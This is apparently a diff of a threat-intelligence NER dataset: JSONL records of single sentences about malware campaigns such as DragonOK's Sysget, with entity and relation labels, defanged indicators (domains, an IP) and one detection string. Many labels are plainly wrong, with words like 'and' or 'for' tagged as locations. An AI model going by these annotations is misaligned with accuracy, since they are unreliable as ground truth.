technique.","entities":[{"id":46615,"label":"SOFTWARE","start_offset":25,"end_offset":33},{"id":46616,"label":"SOFTWARE","start_offset":51,"end_offset":58},{"id":46617,"label":"malware","start_offset":68,"end_offset":77}],"relations":[],"Comments":[]} -{"id":1235,"text":"Cardbuyer targets 11 different online payment platforms, as well as stolen prepaid cards, by parsing their verification SMS and automatically replying.","entities":[{"id":46618,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":1236,"text":" The good news is this technique might be partially mitigated in Android KitKat (version 4.4), where Google introduced a security enhancement around SMS security.","entities":[{"id":46619,"label":"identity","start_offset":101,"end_offset":107},{"id":46620,"label":"SOFTWARE","start_offset":65,"end_offset":93}],"relations":[],"Comments":[]} -{"id":1237,"text":"A user can set a system-wide default SMS app as the only app with permission to send and receive SMS.","entities":[],"relations":[],"Comments":[]} -{"id":1238,"text":"However, other installed apps are still allowed to receive SMS and upload the content via Internet.","entities":[],"relations":[],"Comments":[]} -{"id":1239,"text":"But as of June 4, 2014, only 13.6% of worldwide users had installed Android 4.4 or above.","entities":[{"id":44947,"label":"TIME","start_offset":10,"end_offset":22},{"id":44948,"label":"SOFTWARE","start_offset":68,"end_offset":80}],"relations":[],"Comments":[]} -{"id":1240,"text":"This means more than 86% of Android users do not benefit from this enhancement and are vulnerable.","entities":[{"id":46621,"label":"SOFTWARE","start_offset":28,"end_offset":35}],"relations":[],"Comments":[]} -{"id":1241,"text":"However, Palo Alto Networks users are protected from these PUAs by subscribing to WildFire and GlobalProtect services.","entities":[{"id":46624,"label":"SOFTWARE","start_offset":95,"end_offset":108},{"id":46625,"label":"identity","start_offset":9,"end_offset":27},{"id":46622,"label":"SOFTWARE","start_offset":82,"end_offset":90}],"relations":[],"Comments":[]} -{"id":1242,"text":" SMS-based IAP SDKs have become a gray zone that needs close attention.","entities":[],"relations":[],"Comments":[]} -{"id":1243,"text":"Because of convenience and popularity, SMS-based IAP will likely continue to spread and increase in worldwide use.","entities":[],"relations":[],"Comments":[]} -{"id":1244,"text":"However, users need to be protected from PUAs and malware that abuses the SMS-based IAP.","entities":[],"relations":[],"Comments":[]} -{"id":1245,"text":"Also, developers need to be aware that SMS cannot meet security requirements (e.g. authentication) during the payment transactions.","entities":[],"relations":[],"Comments":[]} -{"id":1246,"text":" We would like to thank Kyle Sanders for his contribution to this work.","entities":[{"id":46626,"label":"identity","start_offset":24,"end_offset":36}],"relations":[],"Comments":[]} -{"id":1247,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1248,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":1249,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":1250,"text":"This post is also available in: 日本語 (Japanese) Palo Alto Networks Unit 42","entities":[{"id":3816,"label":"identity","start_offset":53,"end_offset":71},{"id":3817,"label":"identity","start_offset":72,"end_offset":79}],"relations":[],"Comments":[]} -{"id":1251,"text":"used the AutoFocus threat intelligence service to identify a series of phishing attacks against Japanese organizations.","entities":[{"id":46627,"label":"SOFTWARE","start_offset":9,"end_offset":18},{"id":44949,"label":"identity","start_offset":96,"end_offset":118},{"id":44950,"label":"attack-pattern","start_offset":71,"end_offset":87}],"relations":[],"Comments":[]} -{"id":1252,"text":"Using AutoFocus to quickly search and correlate artifacts across the collective set of WildFire and other Palo Alto Networks threat intelligence, we were able to associate the attacks with the group publicly known as “DragonOK.”","entities":[{"id":3823,"label":"malware","start_offset":87,"end_offset":95},{"id":3826,"label":"threat-actor","start_offset":218,"end_offset":226},{"id":46628,"label":"SOFTWARE","start_offset":6,"end_offset":15},{"id":46629,"label":"identity","start_offset":106,"end_offset":124}],"relations":[{"id":196,"from_id":3826,"to_id":3823,"type":"authored-by"}],"Comments":[]} -{"id":1253,"text":"[1] These attacks took place between January and March of 2015.","entities":[{"id":46630,"label":"TIME","start_offset":37,"end_offset":62}],"relations":[],"Comments":[]} -{"id":1254,"text":" DragonOK has previously targeted Japanese high-tech and manufacturing firms, but we’ve identified a new backdoor malware, named “FormerFirstRAT,” deployed by these attackers.","entities":[{"id":3828,"label":"threat-actor","start_offset":1,"end_offset":9},{"id":3832,"label":"malware","start_offset":130,"end_offset":144},{"id":44952,"label":"identity","start_offset":34,"end_offset":76}],"relations":[{"id":198,"from_id":3832,"to_id":3828,"type":"authored-by"},{"id":197,"from_id":3828,"to_id":44952,"type":"targets"}],"Comments":[]} -{"id":1255,"text":"See the “Malware Details” section for analysis of the three RATs and two additional backdoors deployed in this persistent attack campaign.","entities":[],"relations":[],"Comments":[]} -{"id":1256,"text":" This campaign involved five separate phishing attacks, each carrying a different variant of Sysget malware, also known as HelloBridge.","entities":[{"id":46631,"label":"attack-pattern","start_offset":38,"end_offset":54},{"id":46632,"label":"malware","start_offset":93,"end_offset":99},{"id":46633,"label":"malware","start_offset":123,"end_offset":134}],"relations":[{"id":199,"from_id":46633,"to_id":46632,"type":"variant-of"}],"Comments":[]} -{"id":1257,"text":"The malware was included as an attachment intended to trick the user into opening the malware.","entities":[{"id":44954,"label":"attack-pattern","start_offset":31,"end_offset":81}],"relations":[],"Comments":[]} -{"id":1258,"text":"This included altering the icon of the executable to appear as other file types (Figure 1) as well as decoy documents to trick users into thinking they had opened a legitimate file.","entities":[],"relations":[],"Comments":[]} -{"id":1259,"text":" Figure 1. Icons used by malicious Sysget attachments.","entities":[{"id":46635,"label":"malware","start_offset":35,"end_offset":41}],"relations":[],"Comments":[]} -{"id":1260,"text":" All of the Sysget files used in this campaign communicate with a single command and control (C2) server, hosted at biosnews[.]info.","entities":[{"id":44955,"label":"DOMAIN","start_offset":116,"end_offset":131},{"id":44956,"label":"Infrastucture","start_offset":73,"end_offset":105},{"id":44957,"label":"malware","start_offset":12,"end_offset":24}],"relations":[{"id":42,"from_id":44957,"to_id":44956,"type":"communicates-with"},{"id":201,"from_id":44956,"to_id":44955,"type":"hosts"}],"Comments":[]} -{"id":1261,"text":"Sysget communicates with this server using the HTTP protocol; see the Malware Details section for specifics of the command and control traffic.","entities":[{"id":46636,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":1262,"text":"All five phishing campaigns targeted a Japanese manufacturing firm over the course of two months, but the final campaign also targeted a separate Japanese high-tech organization.","entities":[{"id":46637,"label":"attack-pattern","start_offset":9,"end_offset":27},{"id":46639,"label":"identity","start_offset":146,"end_offset":177},{"id":46638,"label":"identity","start_offset":39,"end_offset":61}],"relations":[{"id":203,"from_id":46637,"to_id":46639,"type":"targets"},{"id":202,"from_id":46637,"to_id":46638,"type":"targets"}],"Comments":[]} -{"id":1263,"text":"(Figure 2)","entities":[],"relations":[],"Comments":[]} -{"id":1264,"text":"Figure 2.","entities":[],"relations":[],"Comments":[]} -{"id":1265,"text":"Five Sysget samples used to target two Japanese organizations.","entities":[{"id":46640,"label":"identity","start_offset":39,"end_offset":61},{"id":46641,"label":"malware","start_offset":5,"end_offset":11}],"relations":[],"Comments":[]} -{"id":1266,"text":" Four of the five Sysget variants included a form of decoy document to trick users into believing they had opened a legitimate file rather than malware.","entities":[{"id":46642,"label":"malware","start_offset":18,"end_offset":24},{"id":44958,"label":"attack-pattern","start_offset":53,"end_offset":67}],"relations":[{"id":204,"from_id":46642,"to_id":44958,"type":"uses"}],"Comments":[]} -{"id":1267,"text":"Two of the executables used decoy documents that included information about obituaries.","entities":[],"relations":[],"Comments":[]} -{"id":1268,"text":"Figure 3 shows a GIF file containing an obituary notice for a woman, while Figure 4 shows a Microsoft Word document containing the obituary of a man.","entities":[{"id":46643,"label":"SOFTWARE","start_offset":92,"end_offset":106}],"relations":[],"Comments":[]} -{"id":1269,"text":" Figure 3. Japanese decoy document containing an obituary notice for a woman.","entities":[{"id":44959,"label":"attack-pattern","start_offset":20,"end_offset":34}],"relations":[],"Comments":[]} -{"id":1270,"text":" Figure 4. Japanese decoy document containing an obituary notice for a woman.","entities":[{"id":46644,"label":"attack-pattern","start_offset":20,"end_offset":34}],"relations":[],"Comments":[]} -{"id":1271,"text":" The Sysget sample with a PDF icon created a second executable, named Adobe.exe, which simply displayed the following warning.","entities":[{"id":46645,"label":"malware","start_offset":5,"end_offset":11},{"id":46646,"label":"FILEPATH","start_offset":70,"end_offset":79}],"relations":[],"Comments":[]} -{"id":1272,"text":" Figure 5. Error message generated by Adobe.exe ","entities":[{"id":44960,"label":"FILEPATH","start_offset":38,"end_offset":47}],"relations":[],"Comments":[]} -{"id":1273,"text":"The final Sysget sample used a Microsoft Excel icon and opened an Excel document that contained cells filled with “XXXXXX.”","entities":[{"id":46648,"label":"SOFTWARE","start_offset":66,"end_offset":71},{"id":46647,"label":"SOFTWARE","start_offset":31,"end_offset":46},{"id":46649,"label":"malware","start_offset":9,"end_offset":16}],"relations":[],"Comments":[]} -{"id":1274,"text":"(Figure 6) Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":1275,"text":"Excel spreadsheet with Xs in multiple rows and columns.","entities":[{"id":44961,"label":"SOFTWARE","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} -{"id":1276,"text":" These Sysget variants appear to be a first stage payload in these attacks.","entities":[{"id":46650,"label":"malware","start_offset":7,"end_offset":13}],"relations":[],"Comments":[]} -{"id":1277,"text":"During analysis of this threat, we identified five additional backdoor tools hosted on biosnews[.]info which may be downloaded by the Sysget variants once the attackers have established a foothold.","entities":[{"id":46651,"label":"DOMAIN","start_offset":87,"end_offset":102},{"id":46652,"label":"malware","start_offset":134,"end_offset":140}],"relations":[{"id":206,"from_id":46651,"to_id":46652,"type":"hosts"}],"Comments":[]} -{"id":1278,"text":" Three of the backdoors, NFlog, PoisonIvy, and NewCT have previously been publicly associated with DragonOK.","entities":[{"id":44962,"label":"malware","start_offset":25,"end_offset":30},{"id":44963,"label":"malware","start_offset":32,"end_offset":41},{"id":44964,"label":"malware","start_offset":47,"end_offset":52},{"id":44965,"label":"threat-actor","start_offset":99,"end_offset":107}],"relations":[{"id":48,"from_id":44962,"to_id":44965,"type":"authored-by"},{"id":47,"from_id":44963,"to_id":44965,"type":"authored-by"},{"id":46,"from_id":44964,"to_id":44965,"type":"authored-by"}],"Comments":[]} -{"id":1279,"text":"Additionally, the actors have now added the popular PlugX backdoor to their toolkit.","entities":[{"id":46653,"label":"malware","start_offset":52,"end_offset":66}],"relations":[],"Comments":[]} -{"id":1280,"text":"An additional backdoor appears to be a new, custom-built tool, which we have not previously associated with DragonOK or any other attack group.","entities":[{"id":46654,"label":"threat-actor","start_offset":108,"end_offset":116}],"relations":[],"Comments":[]} -{"id":1281,"text":"We’ve named this tool “FormerFirstRAT” as it appears to be the names used by the developers to refer to their creations.","entities":[{"id":44966,"label":"malware","start_offset":23,"end_offset":37}],"relations":[],"Comments":[]} -{"id":1282,"text":"Figure 7 shows the relationship between these backdoors and their respective command and control servers.","entities":[],"relations":[],"Comments":[]} -{"id":1283,"text":" Figure 7. Relationship between five additional backdoors used by DragonOK and their C2 servers in this campaign.","entities":[{"id":46655,"label":"threat-actor","start_offset":66,"end_offset":74},{"id":46656,"label":"Infrastucture","start_offset":85,"end_offset":95}],"relations":[{"id":208,"from_id":46655,"to_id":46656,"type":"uses"}],"Comments":[]} -{"id":1284,"text":" The following section details the functionality of the malware deployed in this campaign.","entities":[],"relations":[],"Comments":[]} -{"id":1285,"text":" Sysget\/HelloBridge ","entities":[{"id":46657,"label":"malware","start_offset":1,"end_offset":7},{"id":46658,"label":"malware","start_offset":8,"end_offset":19}],"relations":[],"Comments":[]} -{"id":1286,"text":"In this campaign, Sysget samples were attached to e-mails and used various icons to trick users into infecting their systems.","entities":[{"id":46659,"label":"malware","start_offset":18,"end_offset":24}],"relations":[],"Comments":[]} -{"id":1287,"text":"The majority of these samples are self-extracting executables that contain both a malicious downloader, along with a legitimate file.","entities":[{"id":44967,"label":"attack-pattern","start_offset":82,"end_offset":102}],"relations":[],"Comments":[]} -{"id":1288,"text":"When the self-extracting executable is launched, the downloader and legitimate file are typically dropped in one of the following directories and then executed: When the malicious downloader is executed, it begins by creating the 'mcsong[]' event in order to ensure one instance is running.","entities":[{"id":46660,"label":"attack-pattern","start_offset":171,"end_offset":191}],"relations":[],"Comments":[]} -{"id":1289,"text":"It then spawns a new instance of 'C:\\\\windows\\\\system32\\\\cmd.exe' with a window name of 'Chrome-Update'.","entities":[{"id":46661,"label":"FILEPATH","start_offset":34,"end_offset":64}],"relations":[],"Comments":[]} +{"id":1096,"text":"This is because IE will completely destroy your edits when it writes its new version of the file over yours.","entities":[{"id":46567,"label":"SOFTWARE","start_offset":16,"end_offset":18}],"relations":[],"Comments":[]} +{"id":882,"text":"All data sent via HTTP POST requests is sent in the clear.","entities":[],"relations":[],"Comments":[]} +{"id":8163,"text":" deb-cn.net ap1-acl.net m s-db.net","entities":[],"relations":[],"Comments":[]} +{"id":13972,"text":"Further complicating the issue is the growing scope and scale of attacks today that are successfully targeting the seams between these layers.","entities":[],"relations":[],"Comments":[]} +{"id":14412,"text":"An XDR that supports advanced detection capabilities can identify correlate data across areas to identify events that would otherwise go unnoticed.","entities":[{"id":47170,"label":"SOFTWARE","start_offset":3,"end_offset":7}],"relations":[],"Comments":[]} +{"id":10504,"text":"Last month, we sent 1,755 warnings to users whose accounts were targets of government-backed attackers.","entities":[],"relations":[],"Comments":[]} +{"id":3751,"text":"In most cases, the exploit was only used to drop the payload, however the payloads themself did not contain CVE-2022-22954 exploits for further propagation.","entities":[{"id":49579,"label":"vulnerability","start_offset":108,"end_offset":122}],"relations":[],"Comments":[]} +{"id":8488,"text":"Pay close attention to unrecognized network traffic (both inbound and outbound) and watch for sophisticated new phishing attacks.","entities":[{"id":26173,"label":"location","start_offset":66,"end_offset":69},{"id":26174,"label":"location","start_offset":80,"end_offset":83},{"id":26175,"label":"attack-pattern","start_offset":112,"end_offset":120}],"relations":[],"Comments":[]} +{"id":11078,"text":"We terminated 1 blog as part of our investigation into coordinated influence operations linked to Argentina.","entities":[],"relations":[],"Comments":[]} +{"id":5327,"text":"Data transferring","entities":[],"relations":[],"Comments":[]} +{"id":3446,"text":"We were able to analyze 2,151 packets that triggered the signature and observed both vulnerability scanning activity and active exploitation attempts.","entities":[],"relations":[],"Comments":[]} +{"id":5359,"text":"The mtd_data_t structure The data is read to this structure.","entities":[],"relations":[],"Comments":[]} +{"id":6119,"text":"The registrant information associated with the website hosting the malware is a domain reseller.","entities":[],"relations":[],"Comments":[]} +{"id":828,"text":"As a member of the Microsoft Active Protections Program (MAPP) program, Palo Alto Networks received early details of the vulnerability, providing greater understanding of the threat, which helps us implement strong product coverage.","entities":[{"id":46378,"label":"identity","start_offset":19,"end_offset":62},{"id":44876,"label":"identity","start_offset":72,"end_offset":90}],"relations":[],"Comments":[]} +{"id":4517,"text":"For users, Android provides safety and control over how apps and third parties can access the data from their devices.","entities":[{"id":50316,"label":"SOFTWARE","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} +{"id":7271,"text":"It uses the icon for a Word document file as a disguise, attempting to pass itself off as a legitimate document file.","entities":[],"relations":[],"Comments":[]} +{"id":3283,"text":"The malicious actor can connect to the relevant RTMP address to watch the streaming.","entities":[],"relations":[],"Comments":[]} +{"id":13095,"text":" Robots are a particular risk\u2014not only because so much of modern manufacturing relies on them, but also because many of these machines rely on legacy technology dating back decades.","entities":[],"relations":[],"Comments":[]} +{"id":1755,"text":"However, he had to heavily redact this information due to an agreement between himself and Microsoft.","entities":[{"id":45122,"label":"identity","start_offset":91,"end_offset":100}],"relations":[],"Comments":[]} +{"id":730,"text":" The four critical vulnerabilities discovered by security researchers from Wiz include one unauthenticated remote code execution (RCE) and three privilege escalation vulnerabilities. Dubbed OMIGOD, the four vulnerabilities were found to directly affect Azure cloud instances using the following Azure services: Prisma Cloud Compute Defender agents can detect whether any Azure system is vulnerable to any of the four CVEs.","entities":[{"id":46306,"label":"attack-pattern","start_offset":91,"end_offset":135},{"id":46311,"label":"SOFTWARE","start_offset":313,"end_offset":342},{"id":46307,"label":"attack-pattern","start_offset":145,"end_offset":165},{"id":46309,"label":"SOFTWARE","start_offset":254,"end_offset":265},{"id":46310,"label":"SOFTWARE","start_offset":296,"end_offset":310},{"id":46313,"label":"SOFTWARE","start_offset":373,"end_offset":378},{"id":46308,"label":"vulnerability","start_offset":191,"end_offset":197}],"relations":[],"Comments":[]} +{"id":13629,"text":"A packetFlag \u201cxy\u201d was found inside this Gh0st RAT variant This Gh0st RAT variant implements additional features for stealing QQ messenger user information, for example, a list of users on a given machine and their QQ messenger numbers.","entities":[{"id":51715,"label":"malware","start_offset":67,"end_offset":76},{"id":51714,"label":"malware","start_offset":40,"end_offset":49}],"relations":[],"Comments":[]} +{"id":3030,"text":"Make sure you only give fobs to people that you trust.","entities":[],"relations":[],"Comments":[]} +{"id":3583,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":14309,"text":"Like the Android Maikspy, it first sends a notification to its C&C server to register the device.","entities":[{"id":48530,"label":"SOFTWARE","start_offset":9,"end_offset":17},{"id":48531,"label":"malware","start_offset":17,"end_offset":24},{"id":48532,"label":"Infrastucture","start_offset":63,"end_offset":73}],"relations":[{"id":445,"from_id":48531,"to_id":48532,"type":"beacons-to"}],"Comments":[]} +{"id":748,"text":"They followed that up In July by implementing a deferred free method to solve the freeing issue of use-after-free bugs.","entities":[{"id":46342,"label":"TIME","start_offset":25,"end_offset":29},{"id":46343,"label":"attack-pattern","start_offset":99,"end_offset":113}],"relations":[],"Comments":[]} +{"id":1784,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":3224,"text":" Figure 13.","entities":[],"relations":[],"Comments":[]} +{"id":4197,"text":"Indicator Removal on Host: Timestomp Credential Access T1003.001 OS Credential Dumping: LSASS Memory T1552.002","entities":[{"id":50001,"label":"attack-pattern","start_offset":27,"end_offset":64},{"id":50002,"label":"attack-pattern","start_offset":65,"end_offset":110}],"relations":[],"Comments":[]} +{"id":11220,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} +{"id":2449,"text":"Table 1 shows the parameters that the webshell saved to the server would use for authentication and command and how many times we saw them.","entities":[],"relations":[],"Comments":[]} +{"id":2623,"text":" Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available. DEV-0537 criminal actor targeting organizations for data exfiltration and destruction A Closer Look","entities":[{"id":47799,"label":"identity","start_offset":1,"end_offset":19},{"id":47800,"label":"threat-actor","start_offset":118,"end_offset":126}],"relations":[],"Comments":[]} +{"id":12370,"text":"In the threat actor toolkit, different types of attacks are used for different purposes: Phishing campaigns can be used like a scalpel\u2014targeting specific groups or individuals with personalized lures that are more likely to trick them into taking action (like clicking on a malware link), while DDoS attacks are more like a hatchet\u2014disrupting or blocking a site or a service entirely.","entities":[{"id":38428,"label":"location","start_offset":56,"end_offset":59},{"id":38429,"label":"attack-pattern","start_offset":89,"end_offset":97},{"id":38430,"label":"location","start_offset":108,"end_offset":111},{"id":38431,"label":"location","start_offset":205,"end_offset":208},{"id":38432,"label":"location","start_offset":214,"end_offset":220},{"id":38433,"label":"location","start_offset":230,"end_offset":234},{"id":38434,"label":"location","start_offset":247,"end_offset":253},{"id":38435,"label":"location","start_offset":308,"end_offset":311}],"relations":[],"Comments":[]} +{"id":14060,"text":"Both use different samples for the multiple malware downloaded.","entities":[],"relations":[],"Comments":[]} +{"id":9968,"text":"Malicious update files are prepared, signed with the stolen certificate, and uploaded to the attacker\u2019s server (207[.]148[.]94[.]157).","entities":[{"id":30441,"label":"location","start_offset":23,"end_offset":26},{"id":30442,"label":"location","start_offset":73,"end_offset":76},{"id":30443,"label":"IPV4","start_offset":112,"end_offset":132}],"relations":[],"Comments":[]} +{"id":13181,"text":"The encrypted USBferry malware is embedded in the loader resource section, and the loader drops it into the C:\\Users\\Public\\Documents\\Flash folder and names it flash.dat","entities":[{"id":41131,"label":"malware","start_offset":14,"end_offset":22},{"id":41132,"label":"location","start_offset":66,"end_offset":73},{"id":41133,"label":"location","start_offset":75,"end_offset":78},{"id":41134,"label":"location","start_offset":147,"end_offset":150}],"relations":[],"Comments":[]} +{"id":12280,"text":"If you have communicated with any of these accounts or visited the actors\u2019 blog, we suggest you review your systems for the IOCs provided below.","entities":[],"relations":[],"Comments":[]} +{"id":3579,"text":"The following source code screenshot shows how this is implemented.","entities":[],"relations":[],"Comments":[]} +{"id":2141,"text":"As always, we are monitoring the situation closely and will provide additional details as they become available. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} +{"id":5172,"text":"This technology is situated at the beginning of the supply chain as a layer that connects, controls, and monitors applications, sensors, and actuators, aimed at maintaining interoperability and fault tolerance.","entities":[],"relations":[],"Comments":[]} +{"id":14249,"text":"Here is a timeline of when the C&C server\u2019s IP addresses were first used, based on our monitoring: Figure 6: Timeline of the C&C server\u2019s IP addresses C&C Servers","entities":[],"relations":[],"Comments":[]} +{"id":3108,"text":"This has more in common with the Heartbleed event of 2014.","entities":[{"id":48254,"label":"vulnerability","start_offset":33,"end_offset":43},{"id":48255,"label":"TIME","start_offset":53,"end_offset":57}],"relations":[],"Comments":[]} +{"id":14248,"text":"The earliest activity we tracked on the GitHub account was from August 17, 2016, with the most recent in March 12, 2017.","entities":[{"id":48442,"label":"TIME","start_offset":64,"end_offset":79},{"id":48443,"label":"TIME","start_offset":105,"end_offset":119},{"id":48441,"label":"SOFTWARE","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} +{"id":1760,"text":"Yu Yang then pasted his shellcode that used similar methods to run arbitrary code, showing that the method Yuki Chen used is exactly the one that won Yu the $100,000 award.","entities":[{"id":46910,"label":"identity","start_offset":0,"end_offset":7},{"id":46911,"label":"identity","start_offset":107,"end_offset":116},{"id":46912,"label":"identity","start_offset":150,"end_offset":152}],"relations":[],"Comments":[]} +{"id":13849,"text":"Side-Loading T1073 Uses modified legitimate DLL to load the malicious DLL Process Injection T1055 Injects the decrypted payload into svchost.exe process Exfiltration Exfiltration Over Command and Control Channel T1041","entities":[{"id":42934,"label":"location","start_offset":53,"end_offset":57},{"id":42935,"label":"attack-pattern","start_offset":76,"end_offset":93},{"id":42936,"label":"attack-pattern","start_offset":168,"end_offset":213}],"relations":[],"Comments":[]} +{"id":253,"text":"Our teams at Palo Alto Networks will continue monitoring domain squatting attacks and work to protect customers against them.","entities":[{"id":45949,"label":"identity","start_offset":13,"end_offset":31},{"id":45950,"label":"attack-pattern","start_offset":57,"end_offset":81}],"relations":[],"Comments":[]} +{"id":9757,"text":"But the last layer is the main backdoor body.","entities":[],"relations":[],"Comments":[]} +{"id":2746,"text":"Normal PAN-OS maintenance release updates will provide a fix for the vulnerability.","entities":[{"id":47992,"label":"SOFTWARE","start_offset":7,"end_offset":13}],"relations":[],"Comments":[]} +{"id":13964,"text":"Detailed solutions can be found in our knowledge base article on DarkSide ransomware.","entities":[{"id":43290,"label":"malware","start_offset":65,"end_offset":73}],"relations":[],"Comments":[]} +{"id":13996,"text":"While analyzing the technical details of this malware, which includes two new espionage backdoors, we noticed striking similarities to other malware attributed to the threat actor known as APT37, also known as Reaper or Group 123.","entities":[{"id":48781,"label":"threat-actor","start_offset":188,"end_offset":194},{"id":48782,"label":"threat-actor","start_offset":210,"end_offset":217},{"id":48783,"label":"threat-actor","start_offset":220,"end_offset":229}],"relations":[{"id":461,"from_id":48781,"to_id":48782,"type":"duplicate-of"},{"id":462,"from_id":48781,"to_id":48783,"type":"duplicate-of"}],"Comments":[]} +{"id":2383,"text":"Both StealthMutant and StealthVector contain a payload of either the Cobalt Strike beacon or ScrambleCross, a newly discovered backdoor.","entities":[{"id":47445,"label":"malware","start_offset":5,"end_offset":18},{"id":47448,"label":"malware","start_offset":93,"end_offset":106},{"id":47446,"label":"malware","start_offset":23,"end_offset":36},{"id":47447,"label":"tools","start_offset":69,"end_offset":82}],"relations":[{"id":326,"from_id":47446,"to_id":47447,"type":"uses"},{"id":327,"from_id":47446,"to_id":47448,"type":"uses"},{"id":328,"from_id":47445,"to_id":47447,"type":"uses"},{"id":329,"from_id":47445,"to_id":47448,"type":"uses"}],"Comments":[]} +{"id":513,"text":"Virlock has the largest number of variants due to its file-infector-like behavior.","entities":[{"id":46145,"label":"attack-pattern","start_offset":54,"end_offset":81},{"id":44760,"label":"malware","start_offset":0,"end_offset":7}],"relations":[{"id":159,"from_id":44760,"to_id":46145,"type":"uses"}],"Comments":[]} +{"id":4675,"text":"StartsWith(\"Help us protect you: Security advice from Google\")","entities":[],"relations":[],"Comments":[]} +{"id":415,"text":"And for shoppers, the impact of a successful attack is minimal: there are no lasting effects or impact, making it an annoyance at worst. But because of the potential impact on holiday shopping and the ease of attacks, unauthorized coin mining is an attack that retailers need to be aware of and take active steps for prevention this holiday season.","entities":[{"id":46113,"label":"attack-pattern","start_offset":219,"end_offset":243}],"relations":[],"Comments":[]} +{"id":12046,"text":"We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":37269,"label":"location","start_offset":10,"end_offset":14},{"id":37270,"label":"location","start_offset":89,"end_offset":95},{"id":37271,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} +{"id":13600,"text":"(Note that Flash has been declared end-of-life by Adobe since December 31, 2020.) If the victim downloads and executes the installer downloaded from this page, the victim will be infected with a variant of Gh0stRat malware, previously also named Gh0stCringe or CineregRAT.","entities":[{"id":51687,"label":"TIME","start_offset":62,"end_offset":79},{"id":51688,"label":"malware","start_offset":207,"end_offset":215},{"id":51689,"label":"malware","start_offset":247,"end_offset":258},{"id":51690,"label":"malware","start_offset":262,"end_offset":272}],"relations":[{"id":1133,"from_id":51688,"to_id":51689,"type":"related-to"},{"id":1134,"from_id":51688,"to_id":51690,"type":"related-to"}],"Comments":[]} +{"id":7951,"text":"This method has several stages:","entities":[],"relations":[],"Comments":[]} +{"id":14234,"text":"In fact, we found references to PlugX in the C&C strings we analyzed, indicating that the group may also be using the same backdoor in this particular campaign.","entities":[{"id":44021,"label":"malware","start_offset":32,"end_offset":37}],"relations":[],"Comments":[]} +{"id":2516,"text":" The FBI has connected Conti to more than 400 cyberattacks against organizations worldwide, three-quarters of which are based in the U.S., with demands as high as $25 million.","entities":[{"id":47712,"label":"threat-actor","start_offset":23,"end_offset":28},{"id":47713,"label":"location","start_offset":133,"end_offset":137},{"id":47711,"label":"identity","start_offset":5,"end_offset":8}],"relations":[{"id":343,"from_id":47712,"to_id":47713,"type":"targets"}],"Comments":[]} +{"id":12849,"text":"A security professional can leverage MITRE ATT&CK to audit for coverage gaps to discover where they may be vulnerable to threats.","entities":[{"id":40046,"label":"location","start_offset":2,"end_offset":10},{"id":40047,"label":"location","start_offset":24,"end_offset":27},{"id":40048,"label":"malware","start_offset":28,"end_offset":36},{"id":40050,"label":"location","start_offset":100,"end_offset":103}],"relations":[],"Comments":[]} +{"id":14370,"text":"End users and enterprises can also benefit from multilayered mobile security solutions such as Trend Micro\u2122 Mobile Security for Android\u2122 which is also available on Google Play.","entities":[],"relations":[],"Comments":[]} +{"id":1547,"text":" The figure below shows an example.","entities":[],"relations":[],"Comments":[]} +{"id":13346,"text":"How a scheduled task delivers the malware to a victim's environment","entities":[{"id":41531,"label":"attack-pattern","start_offset":6,"end_offset":20}],"relations":[],"Comments":[]} +{"id":619,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":5437,"text":"In such cases, an average user would not have the ability to fix a Cyclops Blink infection.","entities":[{"id":51436,"label":"malware","start_offset":67,"end_offset":80}],"relations":[],"Comments":[]} +{"id":8276,"text":"Some of these domains were also tied to banking malware, confirming our attacker was not limited to embassies.","entities":[],"relations":[],"Comments":[]} +{"id":1978,"text":"It should be noted that if you want modify the \u201cCookieSize\u201c value, you should modify the other length fields to keep the packet structure valid, as shown below in Figure 4.","entities":[],"relations":[],"Comments":[]} +{"id":11762,"text":"Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google\u2019s naming), and Kantal (Google\u2019s naming) which shares code similarity with Vidar.","entities":[{"id":36265,"label":"malware","start_offset":79,"end_offset":86},{"id":36272,"label":"location","start_offset":161,"end_offset":164}],"relations":[],"Comments":[]} +{"id":13704,"text":"As a result, traditional security solutions won\u2019t be able to protect accounts and systems from such attacks.","entities":[],"relations":[],"Comments":[]} +{"id":568,"text":"The attacker asked for $250 and required payment as 0.004 BTC (suggesting that at the time the ransom note was written, 1 BTC equaled approximately $62,500).","entities":[],"relations":[],"Comments":[]} +{"id":5029,"text":"These phishing domains have been blocked through Google Safe Browsing \u2013 a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[{"id":51097,"label":"SOFTWARE","start_offset":49,"end_offset":69}],"relations":[],"Comments":[]} +{"id":2346,"text":"The exploit worked and ran our bash script as root.","entities":[],"relations":[],"Comments":[]} +{"id":9321,"text":" Figure 5. Magecart Group 11 injection pattern Figure 6.","entities":[{"id":28763,"label":"threat-actor","start_offset":11,"end_offset":19}],"relations":[],"Comments":[]} +{"id":988,"text":" Acknowledgement We greatly appreciate the help from Rongbo Shao from Palo Alto Networks in working on the Threat Prevention signature.","entities":[{"id":46482,"label":"identity","start_offset":71,"end_offset":89},{"id":46483,"label":"identity","start_offset":54,"end_offset":65}],"relations":[],"Comments":[]} +{"id":942,"text":"Background WildFire captures many samples of mobile malware that intercept and upload SMS 